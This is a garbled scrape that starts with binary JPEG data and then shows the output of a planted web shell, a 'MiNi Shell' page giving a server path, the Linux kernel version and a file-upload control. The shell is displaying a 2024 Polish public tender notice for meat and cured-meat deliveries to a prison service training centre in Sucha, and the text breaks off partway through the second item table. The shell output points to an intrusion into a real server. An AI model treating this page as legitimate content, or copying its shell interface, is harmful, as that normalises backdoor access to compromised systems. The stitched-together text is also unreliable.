JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240704/0039648901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy mięsa i wędlin dla Ośrodka Szkolenia Służby Więziennej w Suchej <br/>oraz Oddziału Zamiejscowego w Zwartowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Szkolenia Służby Więziennej w Suchej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000821091</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">144</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sucha</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-526</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 33 412 25</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">os_sucha@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Ośrodek Szkolenia Służby Więziennej w Suchej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy mięsa i wędlin dla Ośrodka Szkolenia Służby Więziennej w Suchej <br/>oraz Oddziału Zamiejscowego w Zwartowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-49c71d7d-39e3-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00396489</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00232534/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawy mięsa i wędlin dla Ośrodka Szkolenia Służby Więziennej w Suchej oraz Oddziału Zamiejscowego w Zwartowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ossw_sucha <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ossw_sucha</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) w formie elektronicznej za pośrednictwem platformazakupowa.pl ( dalej: Platforma ) pod adresem: https://platformazakupowa.pl/pn/ossw_sucha <br/>2.	Komunikacja między zamawiającym a wykonawcą, w tym wszelkie oświadczenia, wnioski, zawiadomienia <br/>i informacje przekazywane będą w formie elektronicznej za pośrednictwem Platformy formularza „Wyślij wiadomość”. Za datę przekazania (wpływu) oświadczenia, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość”, po którym pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza awaryjnie np. <br/>w przypadku przerwy w funkcjonowaniu lub awarii lub niedziałania platformy zakupowej, komunikację <br/>z wykonawcami za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej do kontaktu z Wykonawcami: os_sucha@sw.gov.pl, z zastrzeżeniem, że ofertę (w szczególności Formularz oferty i załączniki do oferty) wykonawca możę złożyć wyłącznie za pośrednictwem platformy zakupowej.<br/>3.	Zamawiający będzie przekazywał wykonawcom informacje pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej – jakim jest – https://platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania ofert i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16) PZP przy użyciu środka komunikacji elektronicznej – jakim jest - https://platformazakupowa.pl. Do konkretnego wykonawcy. <br/>4.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na https://platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5.	Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. Poz. 2452) określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na https://platformazakupowa.pl tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer.,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/><br/>Ciąg dalszy wymagań znajduję się w sekcji: Informacje dodatkowe.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.1 administratorem Pani/Pana danych osobowych jest Komendant Ośrodka Szkolenia Służby Więziennej w Suchej, Sucha 144, 89-526 Lubiewo ; <br/>1.2 w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, kontakt za pomocą poczty elektronicznej na adres e-mail: : iod_os_sucha@sw.gov.pl ; <br/>1.3	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym; <br/>1.4 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP; <br/>1.5	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>1.6	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP; <br/>1.7	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.8 Posiada Pan/Pani: <br/>1.8.1 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>1.8.2 na podstawie art. 16 RODO prawo do żądania sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu i jego załączników;<br/>1.8.3 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>1.8.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>1.9 nie przysługuje Pani/Panu: <br/>1.9.1 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>1.9.2 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>19.3 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSS.2232.67.2024.SZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Dostawy mięsa i wędlin dla Ośrodka Szkolenia Służby Więziennej w Suchej.<br/><br/>Lp.	Nazwa artykułu	j.m.	Ilość<br/>1	2	3	4<br/>1	Boczek świeży	kg	10<br/>2	Golonka peklowana w siatce	kg	100<br/>3	Karkówka bez kości	kg	1900<br/>4	Kości wieprzowe	kg	500<br/>5	Łopatka	kg	1100<br/>6	Mięso gulaszowe	kg	480<br/>7	Mięso mielone	kg	1100<br/>8	Schab z kością	kg	10<br/>9	Schab bez kości	kg	2000<br/>10	Słonina	kg	230<br/>11	Szynka wieprzowa surowa	kg	150<br/>12	Boczek parzony	kg	750<br/>13	Kości wędzone	kg	300<br/>14	Żołądki wołowe krojone	kg	100<br/>15	Wątroba wieprzowa	kg	10<br/>16	Szynka gotowana	kg	225<br/>17	Szynka wędzona	kg	200<br/>18	Filet z indyka	kg	20<br/>19	Polędwica drobiowa	kg	250<br/>20	Polędwica z majerankiem	kg	60<br/>21	Polędwica z warzywami	kg	300<br/>22	Szynka z indyka	kg	180<br/>23	Kurczak w galarecie	kg	125<br/>24	Żywiecka drobiowa	kg	90<br/>25	Parówka drobiowa	kg	60<br/>26	Mielonka drobiowa	kg	80<br/>27	Rolada z kurczaka	kg	15<br/>28	Kurczak faszerowany	Kg	50<br/>29	Rolada ze szpinakiem	Kg	35<br/>30	Rolada z mozzarellą i pomidorami	kg	60<br/>31	Rolada z żurawiną	kg	10<br/>32	Pieczeń z kaczki	Kg	50<br/>33	Filet maślany	Kg	70<br/>34	Pieczeń ze śliwką	Kg	10<br/>35	Salceson czarny	kg	30<br/>36	Kaszanka	kg	100<br/>37	Jałowcowa	kg	120<br/>38	Kabanosy	kg	10<br/>39	Krakowska podsuszana	kg	230<br/>40	Mielonka prasowana	kg	125<br/>41	Mortadela	kg	175<br/>42	Parówka gruba	kg	420<br/>43	Parówka w foli	kg	210<br/>44	Parówki cielęce	kg	220<br/>45	Śląska delikatesowa	kg	290<br/>46	Zwyczajna	kg	1150<br/>47	Krotoszyńska parzona	kg	120<br/>48	Ogonówka parzona	kg	210<br/>49	Pieczeń chłopska	kg	260<br/>50	Polędwica sopocka	kg	250<br/>51	Polędwica wp. z majeran.	kg	170<br/>52	Rolada boczkowa	kg	10<br/>53	Schab z komina	kg	150<br/>54	Sękacz	kg	130<br/>55	Szynka babuni	kg	175<br/>56	Szynka wiejska	kg	140<br/>57	Schab z czosnkiem	kg	150<br/>58	Wędzonka wiejska	Kg	140<br/>59	Polska	kg	90<br/>60	Kiełbasa grillowa	kg	200<br/>61	Kiełbasa toruńska	kg	50<br/>62	Kiełbasa biała cienka	kg	130<br/>63	Biała parzona	kg	300<br/>64	Kiełbasa słoikowa	kg	115<br/>65	Żywiecka	kg	110<br/>66	Metka	kg	110<br/>67	Salceson królewski	kg	70<br/>68	Mielonka konserwowa	kg	120<br/>69	Szynka konserwowa	kg	330<br/>70	Szynka w galarecie	kg	40<br/>71	Szynkowa wieprzowa	kg	200<br/>72	Łopatkowa	kg	170<br/>73	Zapiekaniec z ogórkiem	Kg	70<br/>74	Kindziuk	Kg	20<br/>75	Łopatka pieczona	kg	50<br/>76	Pieczeń myśliwska	kg	35<br/>77	Necówka	Kg	15<br/>78	Pasztetowa wędzona	kg	10<br/>79	Pasztetowa z grzybami	kg	50<br/>80	Pasztetowa ze szczypiorkiem	kg	50<br/>81	Pasztet drobiowy zapiekany	kg	140<br/>82	Pasztetowa firmowa	kg	10<br/>83	Wołowina	kg	20<br/>84	Salami	kg	250<br/>85	Salami z papryką	kg	10<br/>86	Korpusy z kurczaków	kg	1050<br/>87	Skrzydełka z kurczaków	kg	10<br/>88	Udko z kurczaków	kg	10<br/>89	Udziec z kurczaka	kg	900<br/>90	Podudzie z kurczaka	kg	55<br/>91	Ćwiartka z kurczaka	kg	10<br/>92	Filet z kurczaka	Kg	3400<br/>93	Żołądki drobiowe	kg	90<br/>94	Wątroba drobiowa	kg	80 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15113000-3 - Wieprzowina</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131310-1 - Pasztety</p> <p class="mb-0">15112130-6 - Kurczęta</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą dla każdej z części od 1 do 2 zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: <br/>1)	„Łączna cena ofertowa brutto” – C<br/>2)	„Najkrótszy czas wymiany wadliwego towaru” – W<br/><br/><br/><br/><br/>2.	Powyższym kryteriom Zamawiający przypisał następujące znaczenie:<br/>Kryterium<br/> Waga [%] -Punkty<br/>	Waga (%)	Liczba punktów	<br/>Sposób oceny wg wzoru lub wg zestawienia<br/><br/>Cena <br/> ( Łączna cena ofertowa brutto )<br/><br/>	60 %	60	C<br/>Cena najtańszej oferty<br/>C = ------------------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/><br/>Jakość<br/>(Najkrótszy czas wymiany towaru nie więcej niż 6 godzin podanych w pełnych godzinach)<br/><br/>	40%	40	W<br/>nie więcej niż 3 h – 40 pkt.<br/>powyżej 3 h nie więcej niż 4 h – 30 pkt.<br/>powyżej 4 h nie więcej niż 5 h – 20 pkt.<br/>powyżej 5 h nie więcej niż 6 h – 10 pkt.<br/><br/>RAZEM	100%	100	────────────────────<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru: <br/>L = C + W<br/>gdzie: <br/>L - całkowita liczba punktów,<br/>C - punkty uzyskane w kryterium „Łączna cena ofertowa brutto”, <br/>W - punkty uzyskane w kryterium „Najkrótszy czas wymiany towaru”.<br/><br/>Jeżeli Wykonawca nie określi czasu wymiany towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas 6 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najkrótszy czas wymiany towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Dostawy mięsa i wędlin dla Ośrodka Szkolenia Służby Więziennej w Suchej OZ Zwartowo<br/><br/>Lp.	Nazwa artykułu	j.m.	Ilość<br/>1	2	3	4<br/>1	Boczek świeży	kg	10<br/>2	Golonka wieprzowa	kg	100<br/>3	Karkówka bez kości	kg	400<br/>4	Łopatka bez kości	kg	400<br/>5	Mięso mielone	kg	120<br/>6	Polędwiczki wieprzowe	kg	5<br/>7	Schab bez kości	kg	450<br/>8	Słonina	kg	25<br/>9	Szynka bez kości	kg	800<br/>10	Żeberka wieprzowe	kg	250<br/>11	Wołowina bez kości	Kg	10<br/>12	Filet z indyka	Kg	220<br/>13	Porcje rosołowe z kurczaka	Kg	700<br/>14	Skrzydełka z kurczaków	Kg	20<br/>15	Udka z kurczaka	Kg	60<br/>16	Kurczaki	Kg	450<br/>17	Bioderka z kurczaka	Kg	550<br/>18	Pałki z kurczaka	Kg	50<br/>19	Piersi z kurczaka	Kg	900<br/>20	Wątroba drobiowa	Kg	150<br/>21	Flaki wołowe	Kg	35<br/>22	Wątroba wieprzowa	Kg	170<br/>23	Żołądki drobiowe	Kg	60<br/>24	Boczek wędzony	Kg	190<br/>25	Polędwica wędzona	Kg	140<br/>26	Karkówka wędzona	kg	10<br/>27	Schab wędzony	kg	70<br/>28	Baleron	Kg	130<br/>29	Salami	Kg	15<br/>30	Szynka gotowana	kg	